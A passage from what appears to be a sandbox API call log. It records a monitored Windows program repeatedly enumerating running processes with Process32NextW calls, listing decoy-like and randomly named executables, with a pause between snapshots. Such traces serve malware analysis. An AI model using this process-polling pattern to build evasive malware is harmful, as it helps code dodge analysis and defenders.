lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0139.585] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="dwm.exe")) returned 1 [0139.587] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0139.589] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.590] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0139.592] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0139.593] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0139.653] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0139.654] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0139.656] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0139.657] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0139.659] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0139.660] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0139.662] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0139.663] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0139.665] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0139.666] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0139.668] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0139.669] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0139.671] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0139.672] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0139.674] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0139.675] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0139.677] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0139.678] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0139.680] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.681] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0139.683] CloseHandle (hObject=0xc4) returned 1 [0139.683] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0139.690] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.691] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 
[0139.728] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0139.729] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0139.729] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0139.730] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0139.731] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0139.731] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0139.732] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0139.732] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0139.733] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.734] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.735] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.735] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.736] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.736] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0139.737] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.738] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.738] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0139.740] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.741] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0139.742] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0139.743] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0139.744] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0139.745] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.746] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0139.748] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0139.749] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0139.750] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0139.751] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="xplivecam.exe")) returned 1 [0139.752] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0139.753] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0139.754] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0139.756] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0139.757] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0139.758] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0139.759] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0139.802] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0139.804] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0139.805] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0139.807] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0139.808] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0139.810] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0139.811] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0139.813] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0139.814] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0139.816] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.831] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0139.832] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0139.833] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0139.834] CloseHandle (hObject=0xbc) returned 1 [0139.834] Sleep (dwMilliseconds=0x12c) [0140.811] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0140.827] 
Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0140.828] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0140.829] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0140.830] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0140.831] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, 